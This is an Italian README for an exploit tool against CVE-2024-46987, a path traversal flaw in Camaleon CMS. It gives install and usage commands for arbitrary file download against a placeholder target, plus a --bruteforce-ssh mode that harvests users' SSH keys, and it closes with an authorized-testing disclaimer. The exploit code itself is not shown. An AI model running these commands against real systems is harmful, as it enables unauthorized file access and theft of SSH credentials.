
Exploit per CVE-2024-46987 path traversal in Camaleon CMS che consente il download arbitrario di file e l'estrazione automatica delle chiavi SSH tramite brute-force.
Questo strumento sfrutta una vulnerabilità di Path Traversal in Camaleon CMS (CVE-2024-46987). Consente il download arbitrario di file e include una funzionalità automatica per tentare di recuperare chiavi SSH dagli utenti scoperti nel sistema.
pip install -r requirements.txt
Di default, lo script viene eseguito in modalità interattiva dove puoi inserire i percorsi dei file da scaricare.
python3 cve-2024-46987.py -u http://target.com -l admin -p password
Usa il flag --bruteforce-ssh per cercare automaticamente chiavi SSH.
python3 cve-2024-46987.py -u http://target.com -l admin -p password --bruteforce-ssh
-u, --url: URL di base del target (Obbligatorio)-l, --login: Nome utente per il login (Default: admin)-p, --password: Password per il login (Default: password)-c, --cookie: Cookie di sessione manuale (Opzionale)--bruteforce-ssh: Abilita la modalità di raccolta automatica delle chiavi SSHQuesto strumento è solo per scopi educativi e test di penetrazione autorizzati. L'uso di questo strumento per attaccare target senza previo consenso reciproco è illegale.